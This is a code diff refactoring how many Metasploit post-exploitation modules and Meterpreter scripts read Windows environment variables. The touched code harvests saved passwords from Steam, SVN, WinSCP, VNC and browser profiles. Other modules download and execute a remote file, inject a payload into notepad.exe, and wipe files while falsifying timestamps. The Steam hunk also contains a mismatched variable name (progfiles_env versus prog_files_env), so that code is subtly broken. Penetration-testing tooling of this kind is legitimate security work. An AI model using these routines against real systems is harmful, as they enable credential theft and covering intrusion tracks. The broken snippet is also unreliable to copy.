|
when /win64/i
|
||||||
@progs = drive + '\\Program Files (x86)\\'
|
@progs = drive + '\\Program Files (x86)\\'
|
||||||
|
@ -360,6 +360,6 @@ class Metasploit3 < Msf::Post
|
||||||
end
|
end
|
||||||
|
|
||||||
def whoami
|
def whoami
|
||||||
return session.fs.file.expand_path("%USERNAME%")
|
return session.sys.config.getenv('USERNAME')
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -40,10 +40,12 @@ class Metasploit3 < Msf::Post
|
||||||
# Steam client is only 32 bit so we need to know what arch we are on so that we can use
|
# Steam client is only 32 bit so we need to know what arch we are on so that we can use
|
||||||
# the correct program files folder.
|
# the correct program files folder.
|
||||||
# We will just use an x64 only defined env variable to check.
|
# We will just use an x64 only defined env variable to check.
|
||||||
if not expand_path('%ProgramFiles(X86)%').empty? and expand_path('%ProgramFiles(X86)%') !~ /%ProgramFiles\(X86\)%/
|
progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
|
||||||
progs = expand_path('%ProgramFiles(X86)%') #x64
|
progfilesx86 = prog_files_env['ProgramFiles(X86)']
|
||||||
|
if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
|
||||||
|
progs = progfilesx86 # x64
|
||||||
else
|
else
|
||||||
progs = expand_path('%ProgramFiles%') #x86
|
progs = progfiles_env['ProgramFiles'] # x86
|
||||||
end
|
end
|
||||||
path = progs + '\\Steam\\config'
|
path = progs + '\\Steam\\config'
|
||||||
|
|
||||||
|
|
|
@ -103,8 +103,7 @@ class Metasploit3 < Msf::Post
|
||||||
def get_config_files
|
def get_config_files
|
||||||
# Determine if TortoiseSVN is installed and parse config files
|
# Determine if TortoiseSVN is installed and parse config files
|
||||||
savedpwds = 0
|
savedpwds = 0
|
||||||
user_appdata = session.fs.file.expand_path("%APPDATA%")
|
path = session.fs.file.expand_path("%APPDATA%\\Subversion\\auth\\svn.simple\\")
|
||||||
path = user_appdata + '\\Subversion\\auth\\svn.simple\\'
|
|
||||||
print_status("Checking for configuration files in: #{path}")
|
print_status("Checking for configuration files in: #{path}")
|
||||||
|
|
||||||
begin
|
begin
|
||||||
|
|
|
@ -107,7 +107,7 @@ class Metasploit3 < Msf::Post
|
||||||
end
|
end
|
||||||
|
|
||||||
def check_systemroot
|
def check_systemroot
|
||||||
winpath = expand_path("%SYSTEMROOT%")+'\\wcx_ftp.ini'
|
winpath = expand_path("%SYSTEMROOT%\\wcx_ftp.ini")
|
||||||
check_other(winpath)
|
check_other(winpath)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -98,11 +98,15 @@ class Metasploit3 < Msf::Post
|
||||||
locations = []
|
locations = []
|
||||||
|
|
||||||
#Checks
|
#Checks
|
||||||
locations << {:name => 'UltraVNC',
|
progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)')
|
||||||
:check_file => session.fs.file.expand_path("%PROGRAMFILES%")+'\\UltraVNC\\ultravnc.ini',
|
progfiles_env.each do |k, v|
|
||||||
:pass_variable => 'passwd=',
|
next if v.blank?
|
||||||
:viewonly_variable => 'passwd2=',
|
locations << {:name => 'UltraVNC',
|
||||||
:port_variable => 'PortNumber='}
|
:check_file => "#{v}\\UltraVNC\\ultravnc.ini",
|
||||||
|
:pass_variable => 'passwd=',
|
||||||
|
:viewonly_variable => 'passwd2=',
|
||||||
|
:port_variable => 'PortNumber='}
|
||||||
|
end
|
||||||
|
|
||||||
locations << {:name => 'WinVNC3_HKLM',
|
locations << {:name => 'WinVNC3_HKLM',
|
||||||
:check_reg => 'HKLM\\Software\\ORL\\WinVNC3',
|
:check_reg => 'HKLM\\Software\\ORL\\WinVNC3',
|
||||||
|
|
|
@ -237,7 +237,7 @@ class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
def run
|
def run
|
||||||
print_status("Looking for WinSCP.ini file storage...")
|
print_status("Looking for WinSCP.ini file storage...")
|
||||||
get_ini(client.fs.file.expand_path("%PROGRAMFILES%")+'\\WinSCP\\WinSCP.ini')
|
get_ini(client.fs.file.expand_path("%PROGRAMFILES%\\WinSCP\\WinSCP.ini"))
|
||||||
print_status("Looking for Registry Storage...")
|
print_status("Looking for Registry Storage...")
|
||||||
get_reg()
|
get_reg()
|
||||||
print_status("Done!")
|
print_status("Done!")
|
||||||
|
|
|
@ -53,7 +53,8 @@ class Metasploit3 < Msf::Post
|
||||||
user = session.sys.config.getuid
|
user = session.sys.config.getuid
|
||||||
userpath = nil
|
userpath = nil
|
||||||
useroffcpath = nil
|
useroffcpath = nil
|
||||||
sysdrv = session.fs.file.expand_path("%SystemDrive%")
|
env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
|
||||||
|
sysdrv = env_vars['SystemDrive']
|
||||||
if os =~ /Windows 7|Vista|2008/
|
if os =~ /Windows 7|Vista|2008/
|
||||||
userpath = sysdrv + "\\Users\\"
|
userpath = sysdrv + "\\Users\\"
|
||||||
lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
|
lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
|
||||||
|
@ -76,7 +77,7 @@ class Metasploit3 < Msf::Post
|
||||||
userinfo = {}
|
userinfo = {}
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
uservar = session.fs.file.expand_path("%USERNAME%")
|
uservar = env_vars['USERNAME']
|
||||||
userinfo['username'] = uservar
|
userinfo['username'] = uservar
|
||||||
userinfo['userpath'] = userpath + uservar + lnkpath
|
userinfo['userpath'] = userpath + uservar + lnkpath
|
||||||
userinfo['useroffcpath'] = userpath + uservar + officelnkpath
|
userinfo['useroffcpath'] = userpath + uservar + officelnkpath
|
||||||
|
|
|
@ -285,7 +285,8 @@ class Metasploit3 < Msf::Post
|
||||||
host = session.session_host
|
host = session.session_host
|
||||||
|
|
||||||
#Get Google Chrome user data path
|
#Get Google Chrome user data path
|
||||||
sysdrive = expand_path("%SYSTEMDRIVE%").strip
|
env_vars = session.sys.config.getenvs('SYSTEMDRIVE', 'USERNAME')
|
||||||
|
sysdrive = env_vars['SYSTEMDRIVE'].strip
|
||||||
if directory?("#{sysdrive}\\Users")
|
if directory?("#{sysdrive}\\Users")
|
||||||
@profiles_path = "#{sysdrive}/Users"
|
@profiles_path = "#{sysdrive}/Users"
|
||||||
@data_path = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
|
@data_path = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
|
||||||
|
@ -310,7 +311,7 @@ class Metasploit3 < Msf::Post
|
||||||
else
|
else
|
||||||
uid = session.sys.config.getuid
|
uid = session.sys.config.getuid
|
||||||
print_status "Running as user '#{uid}'..."
|
print_status "Running as user '#{uid}'..."
|
||||||
usernames << expand_path("%USERNAME%").strip
|
usernames << env_vars['USERNAME'].strip
|
||||||
end
|
end
|
||||||
|
|
||||||
has_sqlite3 = true
|
has_sqlite3 = true
|
||||||
|
|
|
@ -292,7 +292,7 @@ class Metasploit3 < Msf::Post
|
||||||
return results
|
return results
|
||||||
end
|
end
|
||||||
|
|
||||||
windir = session.fs.file.expand_path("%windir%")
|
windir = session.sys.config.getenv('windir')
|
||||||
getfile = session.fs.file.search(windir + "\\system32\\drivers\\etc\\","services.*",recurse=true,timeout=-1)
|
getfile = session.fs.file.search(windir + "\\system32\\drivers\\etc\\","services.*",recurse=true,timeout=-1)
|
||||||
|
|
||||||
data = nil
|
data = nil
|
||||||
|
@ -332,7 +332,7 @@ class Metasploit3 < Msf::Post
|
||||||
elsif exist?(val_location + "\\my.cnf")
|
elsif exist?(val_location + "\\my.cnf")
|
||||||
data = read_file(val_location + "\\my.cnf")
|
data = read_file(val_location + "\\my.cnf")
|
||||||
else
|
else
|
||||||
sysdriv=session.fs.file.expand_path("%SYSTEMDRIVE%")
|
sysdriv=session.sys.config.getenv('SYSTEMDRIVE')
|
||||||
getfile = session.fs.file.search(sysdriv + "\\","my.ini",recurse=true,timeout=-1)
|
getfile = session.fs.file.search(sysdriv + "\\","my.ini",recurse=true,timeout=-1)
|
||||||
getfile.each do |file|
|
getfile.each do |file|
|
||||||
if exist?("#{file['path']}\\#{file['name']}")
|
if exist?("#{file['path']}\\#{file['name']}")
|
||||||
|
|
|
@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
|
|
||||||
def download_files(location, file_type)
|
def download_files(location, file_type)
|
||||||
sysdriv = client.fs.file.expand_path("%SYSTEMDRIVE%")
|
sysdriv = client.sys.config.getenv('SYSTEMDRIVE')
|
||||||
sysnfo = client.sys.config.sysinfo['OS']
|
sysnfo = client.sys.config.sysinfo['OS']
|
||||||
profile_path_old = sysdriv + "\\Documents and Settings\\"
|
profile_path_old = sysdriv + "\\Documents and Settings\\"
|
||||||
profile_path_new = sysdriv + "\\Users\\"
|
profile_path_new = sysdriv + "\\Users\\"
|
||||||
|
|
|
@ -257,7 +257,7 @@ class Metasploit3 < Msf::Post
|
||||||
xp_c = "\\Cookies\\index.dat"
|
xp_c = "\\Cookies\\index.dat"
|
||||||
h_paths = []
|
h_paths = []
|
||||||
c_paths = []
|
c_paths = []
|
||||||
base = session.fs.file.expand_path("%USERPROFILE%")
|
base = session.sys.config.getenv('USERPROFILE')
|
||||||
if host['OS'] =~ /(Windows 7|2008|Vista)/
|
if host['OS'] =~ /(Windows 7|2008|Vista)/
|
||||||
h_paths << base + vist_h
|
h_paths << base + vist_h
|
||||||
h_paths << base + vist_hlow
|
h_paths << base + vist_hlow
|
||||||
|
|
|
@ -28,7 +28,8 @@ class Metasploit3 < Msf::Post
|
||||||
users = []
|
users = []
|
||||||
user = session.sys.config.getuid
|
user = session.sys.config.getuid
|
||||||
path4users = ""
|
path4users = ""
|
||||||
sysdrv = session.fs.file.expand_path("%SystemDrive%")
|
env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
|
||||||
|
sysdrv = env_vars['SystemDrive']
|
||||||
|
|
||||||
if os =~ /Windows 7|Vista|2008/
|
if os =~ /Windows 7|Vista|2008/
|
||||||
path4users = sysdrv + "\\Users\\"
|
path4users = sysdrv + "\\Users\\"
|
||||||
|
@ -49,7 +50,7 @@ class Metasploit3 < Msf::Post
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
userinfo = {}
|
userinfo = {}
|
||||||
uservar = session.fs.file.expand_path("%USERNAME%")
|
uservar = env_vars['USERNAME']
|
||||||
userinfo['username'] = uservar
|
userinfo['username'] = uservar
|
||||||
userinfo['userappdata'] = path4users + uservar + profilepath
|
userinfo['userappdata'] = path4users + uservar + profilepath
|
||||||
users << userinfo
|
users << userinfo
|
||||||
|
@ -89,7 +90,7 @@ class Metasploit3 < Msf::Post
|
||||||
end
|
end
|
||||||
if powershell_version =~ /2./
|
if powershell_version =~ /2./
|
||||||
print_status("Powershell Modules:")
|
print_status("Powershell Modules:")
|
||||||
powershell_module_path = session.fs.file.expand_path("%PSModulePath%")
|
powershell_module_path = session.sys.config.getenv('PSModulePath')
|
||||||
session.fs.dir.foreach(powershell_module_path) do |m|
|
session.fs.dir.foreach(powershell_module_path) do |m|
|
||||||
next if m =~ /^(\.|\.\.)$/
|
next if m =~ /^(\.|\.\.)$/
|
||||||
print_status("\t#{m}")
|
print_status("\t#{m}")
|
||||||
|
|
|
@ -183,7 +183,7 @@ class Metasploit3 < Msf::Post
|
||||||
print_prefetch_key_value
|
print_prefetch_key_value
|
||||||
print_timezone_key_values(key_value)
|
print_timezone_key_values(key_value)
|
||||||
print_good("Current UTC Time: %s" % Time.now.utc)
|
print_good("Current UTC Time: %s" % Time.now.utc)
|
||||||
sys_root = expand_path("%SYSTEMROOT%")
|
sys_root = session.sys.config.getenv('SYSTEMROOT')
|
||||||
full_path = sys_root + "\\Prefetch\\"
|
full_path = sys_root + "\\Prefetch\\"
|
||||||
file_type = "*.pf"
|
file_type = "*.pf"
|
||||||
print_status("Gathering information from remote system. This will take awhile..")
|
print_status("Gathering information from remote system. This will take awhile..")
|
||||||
|
|
|
@ -115,7 +115,7 @@ class Metasploit3 < Msf::Post
|
||||||
# Initialize all 7 possible paths for the answer file
|
# Initialize all 7 possible paths for the answer file
|
||||||
#
|
#
|
||||||
def init_paths
|
def init_paths
|
||||||
drive = session.fs.file.expand_path("%SystemDrive%")
|
drive = session.sys.config.getenv('SystemDrive')
|
||||||
|
|
||||||
files =
|
files =
|
||||||
[
|
[
|
||||||
|
|
|
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Post
|
||||||
register_advanced_options(
|
register_advanced_options(
|
||||||
[
|
[
|
||||||
OptString.new('EXEC_STRING', [false, 'Execution parameters when run from download directory' ]),
|
OptString.new('EXEC_STRING', [false, 'Execution parameters when run from download directory' ]),
|
||||||
OptInt.new('EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]),
|
OptInt.new( 'EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]),
|
||||||
OptBool.new( 'DELETE', [true, 'Delete file after execution', false ]),
|
OptBool.new( 'DELETE', [true, 'Delete file after execution', false ]),
|
||||||
], self.class)
|
], self.class)
|
||||||
|
|
||||||
|
@ -76,16 +76,16 @@ class Metasploit3 < Msf::Post
|
||||||
url = datastore["URL"]
|
url = datastore["URL"]
|
||||||
filename = datastore["FILENAME"] || url.split('/').last
|
filename = datastore["FILENAME"] || url.split('/').last
|
||||||
|
|
||||||
download_path = session.fs.file.expand_path(datastore["DOWNLOAD_PATH"])
|
path = datastore['DOWNLOAD_PATH']
|
||||||
if download_path.nil? or download_path.empty?
|
if path.blank?
|
||||||
path = session.fs.file.expand_path("%TEMP%")
|
path = session.sys.config.getenv('TEMP')
|
||||||
else
|
else
|
||||||
path = download_path
|
path = session.fs.file.expand_path(path)
|
||||||
end
|
end
|
||||||
|
|
||||||
outpath = path + '\\' + filename
|
outpath = path + '\\' + filename
|
||||||
exec = datastore['EXECUTE']
|
exec = datastore['EXECUTE']
|
||||||
exec_string = datastore['EXEC_STRING'] || ''
|
exec_string = datastore['EXEC_STRING']
|
||||||
output = datastore['OUTPUT']
|
output = datastore['OUTPUT']
|
||||||
remove = datastore['DELETE']
|
remove = datastore['DELETE']
|
||||||
|
|
||||||
|
@ -108,11 +108,7 @@ class Metasploit3 < Msf::Post
|
||||||
# Execute file upon request
|
# Execute file upon request
|
||||||
if exec
|
if exec
|
||||||
begin
|
begin
|
||||||
cmd = "#{outpath} #{exec_string}"
|
cmd = "\"#{outpath}\" #{exec_string}"
|
||||||
|
|
||||||
# If we don't have the following gsub, we get this error in Windows:
|
|
||||||
# "Operation failed: The system cannot find the file specified"
|
|
||||||
cmd = cmd.gsub(/\\/, '\\\\\\').gsub(/\s/, '\ ')
|
|
||||||
|
|
||||||
print_status("Executing file: #{cmd}")
|
print_status("Executing file: #{cmd}")
|
||||||
res = cmd_exec(cmd, nil, datastore['EXEC_TIMEOUT'])
|
res = cmd_exec(cmd, nil, datastore['EXEC_TIMEOUT'])
|
||||||
|
|
|
@ -87,7 +87,7 @@ class Metasploit3 < Msf::Post
|
||||||
end
|
end
|
||||||
|
|
||||||
def create_pac(local_pac)
|
def create_pac(local_pac)
|
||||||
pac_file = expand_path("%APPDATA%") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac"
|
pac_file = session.sys.config.getenv("APPDATA") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac"
|
||||||
conf_pac = ""
|
conf_pac = ""
|
||||||
|
|
||||||
if ::File.exists?(local_pac)
|
if ::File.exists?(local_pac)
|
||||||
|
|
|
@ -159,7 +159,7 @@ class Metasploit3 < Msf::Post
|
||||||
# Creates a temp notepad.exe to inject payload in to given the payload
|
# Creates a temp notepad.exe to inject payload in to given the payload
|
||||||
# Returns process PID
|
# Returns process PID
|
||||||
def create_temp_proc(pay)
|
def create_temp_proc(pay)
|
||||||
windir = client.fs.file.expand_path("%windir%")
|
windir = client.sys.config.getenv('windir')
|
||||||
# Select path of executable to run depending the architecture
|
# Select path of executable to run depending the architecture
|
||||||
if pay.arch.join == "x86" and client.platform =~ /x86/
|
if pay.arch.join == "x86" and client.platform =~ /x86/
|
||||||
cmd = "#{windir}\\System32\\notepad.exe"
|
cmd = "#{windir}\\System32\\notepad.exe"
|
||||||
|
|
|
@ -46,7 +46,8 @@ class Metasploit3 < Msf::Post
|
||||||
else
|
else
|
||||||
print_status("Rpcap service found: #{serv['Name']}")
|
print_status("Rpcap service found: #{serv['Name']}")
|
||||||
reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
|
reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
|
||||||
prog=expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
|
# TODO: check if this works on x64
|
||||||
|
prog=session.sys.config.getenv('ProgramFiles') << "\\winpcap\\rpcapd.exe"
|
||||||
if reg != 2
|
if reg != 2
|
||||||
print_status("Setting rpcapd as 'auto' service")
|
print_status("Setting rpcapd as 'auto' service")
|
||||||
service_change_startup("rpcapd","auto")
|
service_change_startup("rpcapd","auto")
|
||||||
|
|
|
@ -106,7 +106,7 @@ class Metasploit3 < Msf::Post
|
||||||
end
|
end
|
||||||
|
|
||||||
# set profile paths
|
# set profile paths
|
||||||
sysdrive = session.fs.file.expand_path("%SYSTEMDRIVE%")
|
sysdrive = session.sys.config.getenv('SYSTEMDRIVE')
|
||||||
os = @host_info['OS']
|
os = @host_info['OS']
|
||||||
profiles_path = sysdrive + "\\Documents and Settings\\"
|
profiles_path = sysdrive + "\\Documents and Settings\\"
|
||||||
profiles_path = sysdrive + "\\Users\\" if os =~ /(Windows 7|2008|Vista)/
|
profiles_path = sysdrive + "\\Users\\" if os =~ /(Windows 7|2008|Vista)/
|
||||||
|
|
|
@ -57,8 +57,8 @@ class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
#Function to calculate the size of the cluster
|
#Function to calculate the size of the cluster
|
||||||
def size_cluster()
|
def size_cluster()
|
||||||
drive = expand_path("%SystemDrive%")
|
drive = session.sys.config.getenv('SystemDrive')
|
||||||
r = client.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
|
r = session.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
|
||||||
cluster = r["lpBytesPerSector"] * r["lpSectorsPerCluster"]
|
cluster = r["lpBytesPerSector"] * r["lpSectorsPerCluster"]
|
||||||
print_status("Cluster Size: #{cluster}")
|
print_status("Cluster Size: #{cluster}")
|
||||||
|
|
||||||
|
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
#Function to calculate the real file size on disk (file size + slack space)
|
#Function to calculate the real file size on disk (file size + slack space)
|
||||||
def size_on_disk(file)
|
def size_on_disk(file)
|
||||||
size_file = client.fs.file.stat(file).size;
|
size_file = session.fs.file.stat(file).size;
|
||||||
print_status("Size of the file: #{size_file}")
|
print_status("Size of the file: #{size_file}")
|
||||||
|
|
||||||
if (size_file<800)
|
if (size_file<800)
|
||||||
|
@ -94,13 +94,13 @@ class Metasploit3 < Msf::Post
|
||||||
rsec= Rex::Text.rand_text_numeric(7,bad='012')
|
rsec= Rex::Text.rand_text_numeric(7,bad='012')
|
||||||
date = Time.now - rsec.to_i
|
date = Time.now - rsec.to_i
|
||||||
print_status("Changing MACE attributes")
|
print_status("Changing MACE attributes")
|
||||||
client.priv.fs.set_file_mace(file, date,date,date,date)
|
session.priv.fs.set_file_mace(file, date,date,date,date)
|
||||||
end
|
end
|
||||||
|
|
||||||
#Function to overwrite the file
|
#Function to overwrite the file
|
||||||
def file_overwrite(file,type,n)
|
def file_overwrite(file,type,n)
|
||||||
#FILE_FLAG_WRITE_THROUGH: Write operations will go directly to disk
|
#FILE_FLAG_WRITE_THROUGH: Write operations will go directly to disk
|
||||||
r = client.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
|
r = session.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
|
||||||
handle=r['return']
|
handle=r['return']
|
||||||
real_size=size_on_disk(file)
|
real_size=size_on_disk(file)
|
||||||
|
|
||||||
|
@ -118,10 +118,10 @@ class Metasploit3 < Msf::Post
|
||||||
end
|
end
|
||||||
|
|
||||||
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365541(v=vs.85).aspx
|
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365541(v=vs.85).aspx
|
||||||
client.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
|
session.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
|
||||||
|
|
||||||
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365747(v=vs.85).aspx
|
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365747(v=vs.85).aspx
|
||||||
w=client.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
|
w=session.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
|
||||||
|
|
||||||
if w['return']==false
|
if w['return']==false
|
||||||
print_error("The was an error writing to disk, check permissions")
|
print_error("The was an error writing to disk, check permissions")
|
||||||
|
@ -131,7 +131,7 @@ class Metasploit3 < Msf::Post
|
||||||
print_status("#{w['lpNumberOfBytesWritten']} bytes overwritten")
|
print_status("#{w['lpNumberOfBytesWritten']} bytes overwritten")
|
||||||
end
|
end
|
||||||
|
|
||||||
client.railgun.kernel32.CloseHandle(handle)
|
session.railgun.kernel32.CloseHandle(handle)
|
||||||
change_mace(file)
|
change_mace(file)
|
||||||
|
|
||||||
#Generate a long random file name before delete it
|
#Generate a long random file name before delete it
|
||||||
|
@ -139,7 +139,7 @@ class Metasploit3 < Msf::Post
|
||||||
print_status("Changing file name")
|
print_status("Changing file name")
|
||||||
|
|
||||||
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365239(v=vs.85).aspx
|
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365239(v=vs.85).aspx
|
||||||
client.railgun.kernel32.MoveFileA(file,newname)
|
session.railgun.kernel32.MoveFileA(file,newname)
|
||||||
|
|
||||||
file_rm(newname)
|
file_rm(newname)
|
||||||
print_good("File erased!")
|
print_good("File erased!")
|
||||||
|
@ -148,7 +148,7 @@ class Metasploit3 < Msf::Post
|
||||||
#Check if the file is encrypted or compressed
|
#Check if the file is encrypted or compressed
|
||||||
def comp_encr(file)
|
def comp_encr(file)
|
||||||
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa364944(v=vs.85).aspx
|
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa364944(v=vs.85).aspx
|
||||||
handle=client.railgun.kernel32.GetFileAttributesA(file)
|
handle=session.railgun.kernel32.GetFileAttributesA(file)
|
||||||
type= handle['return']
|
type= handle['return']
|
||||||
|
|
||||||
#FILE_ATTRIBUTE_COMPRESSED=0x800
|
#FILE_ATTRIBUTE_COMPRESSED=0x800
|
||||||
|
|
|
@ -61,7 +61,7 @@ def enum_users(os)
|
||||||
user = @client.sys.config.getuid
|
user = @client.sys.config.getuid
|
||||||
userpath = nil
|
userpath = nil
|
||||||
useroffcpath = nil
|
useroffcpath = nil
|
||||||
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
|
sysdrv = @client.sys.config.getenv('SystemDrive')
|
||||||
if os =~ /Windows 7|Vista|2008/
|
if os =~ /Windows 7|Vista|2008/
|
||||||
userpath = sysdrv + "\\Users\\"
|
userpath = sysdrv + "\\Users\\"
|
||||||
lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
|
lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
|
||||||
|
@ -83,7 +83,7 @@ def enum_users(os)
|
||||||
users << userinfo
|
users << userinfo
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
uservar = @client.fs.file.expand_path("%USERNAME%")
|
uservar = @client.sys.config.getenv('USERNAME')
|
||||||
userinfo['username'] = uservar
|
userinfo['username'] = uservar
|
||||||
userinfo['userpath'] = userpath + uservar + lnkpath
|
userinfo['userpath'] = userpath + uservar + lnkpath
|
||||||
userinfo['useroffcpath'] = userpath + uservar + officelnkpath
|
userinfo['useroffcpath'] = userpath + uservar + officelnkpath
|
||||||
|
|
|
@ -89,7 +89,7 @@ if client.platform =~ /win32|win64/
|
||||||
#
|
#
|
||||||
# Upload to the filesystem
|
# Upload to the filesystem
|
||||||
#
|
#
|
||||||
tempdir = client.fs.file.expand_path("%TEMP%")
|
tempdir = client.sys.config.getenv('TEMP')
|
||||||
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
||||||
tempexe.gsub!("\\\\", "\\")
|
tempexe.gsub!("\\\\", "\\")
|
||||||
|
|
||||||
|
|
|
@ -195,7 +195,7 @@ host = session.session_host
|
||||||
@log_dir = File.join(Msf::Config.log_directory, "scripts", "enum_chrome", Rex::FileUtils.clean_path(@host_info['Computer']), Time.now.strftime("%Y%m%d.%H%M"))
|
@log_dir = File.join(Msf::Config.log_directory, "scripts", "enum_chrome", Rex::FileUtils.clean_path(@host_info['Computer']), Time.now.strftime("%Y%m%d.%H%M"))
|
||||||
::FileUtils.mkdir_p(@log_dir)
|
::FileUtils.mkdir_p(@log_dir)
|
||||||
|
|
||||||
sysdrive = client.fs.file.expand_path("%SYSTEMDRIVE%")
|
sysdrive = client.sys.config.getenv('SYSTEMDRIVE')
|
||||||
os = @host_info['OS']
|
os = @host_info['OS']
|
||||||
if os =~ /(Windows 7|2008|Vista)/
|
if os =~ /(Windows 7|2008|Vista)/
|
||||||
@profiles_path = sysdrive + "\\Users\\"
|
@profiles_path = sysdrive + "\\Users\\"
|
||||||
|
@ -218,7 +218,7 @@ if is_system?
|
||||||
print_status "users found: #{usernames.join(", ")}"
|
print_status "users found: #{usernames.join(", ")}"
|
||||||
else
|
else
|
||||||
print_status "running as user '#{uid}'..."
|
print_status "running as user '#{uid}'..."
|
||||||
usernames << client.fs.file.expand_path("%USERNAME%")
|
usernames << client.sys.config.getenv('USERNAME')
|
||||||
prepare_railgun
|
prepare_railgun
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -251,8 +251,9 @@ if client.platform =~ /win32|win64/
|
||||||
if frfxchk
|
if frfxchk
|
||||||
user = @client.sys.config.getuid
|
user = @client.sys.config.getuid
|
||||||
if not is_system?
|
if not is_system?
|
||||||
usrname = Rex::FileUtils.clean_path(@client.fs.file.expand_path("%USERNAME%"))
|
envs = @client.sys.config.getenvs('USERNAME', 'APPDATA')
|
||||||
db_path = @client.fs.file.expand_path("%APPDATA%") + "\\Mozilla\\Firefox\\Profiles"
|
usrname = envs['USERNAME']
|
||||||
|
db_path = envs['APPDATA'] + "\\Mozilla\\Firefox\\Profiles"
|
||||||
if kill_frfx
|
if kill_frfx
|
||||||
kill_firefox
|
kill_firefox
|
||||||
end
|
end
|
||||||
|
|
|
@ -22,7 +22,7 @@ def enum_users
|
||||||
users = []
|
users = []
|
||||||
user = @client.sys.config.getuid
|
user = @client.sys.config.getuid
|
||||||
path4users = ""
|
path4users = ""
|
||||||
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
|
sysdrv = @client.sys.config.getenv('SystemDrive')
|
||||||
|
|
||||||
if os =~ /Windows 7|Vista|2008/
|
if os =~ /Windows 7|Vista|2008/
|
||||||
path4users = sysdrv + "\\Users\\"
|
path4users = sysdrv + "\\Users\\"
|
||||||
|
@ -43,7 +43,7 @@ def enum_users
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
userinfo = {}
|
userinfo = {}
|
||||||
uservar = @client.fs.file.expand_path("%USERNAME%")
|
uservar = @client.sys.config.getenv('USERNAME')
|
||||||
userinfo['username'] = uservar
|
userinfo['username'] = uservar
|
||||||
userinfo['userappdata'] = path4users + uservar + profilepath
|
userinfo['userappdata'] = path4users + uservar + profilepath
|
||||||
users << userinfo
|
users << userinfo
|
||||||
|
@ -83,7 +83,7 @@ def enum_powershell
|
||||||
end
|
end
|
||||||
if powershell_version =~ /2./
|
if powershell_version =~ /2./
|
||||||
print_status("Powershell Modules:")
|
print_status("Powershell Modules:")
|
||||||
powershell_module_path = @client.fs.file.expand_path("%PSModulePath%")
|
powershell_module_path = @client.sys.config.getenv('PSModulePath')
|
||||||
@client.fs.dir.foreach(powershell_module_path) do |m|
|
@client.fs.dir.foreach(powershell_module_path) do |m|
|
||||||
next if m =~ /^(\.|\.\.)$/
|
next if m =~ /^(\.|\.\.)$/
|
||||||
print_status("\t#{m}")
|
print_status("\t#{m}")
|
||||||
|
|
|
@ -223,7 +223,7 @@ def enum_users
|
||||||
users = []
|
users = []
|
||||||
user = @client.sys.config.getuid
|
user = @client.sys.config.getuid
|
||||||
path4users = ""
|
path4users = ""
|
||||||
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
|
sysdrv = @client.sys.config.getenv('SystemDrive')
|
||||||
|
|
||||||
if os =~ /7|Vista|2008/
|
if os =~ /7|Vista|2008/
|
||||||
path4users = sysdrv + "\\users\\"
|
path4users = sysdrv + "\\users\\"
|
||||||
|
@ -244,7 +244,7 @@ def enum_users
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
userinfo = {}
|
userinfo = {}
|
||||||
uservar = @client.fs.file.expand_path("%USERNAME%")
|
uservar = @client.sys.config.getenv('USERNAME')
|
||||||
userinfo['username'] = uservar
|
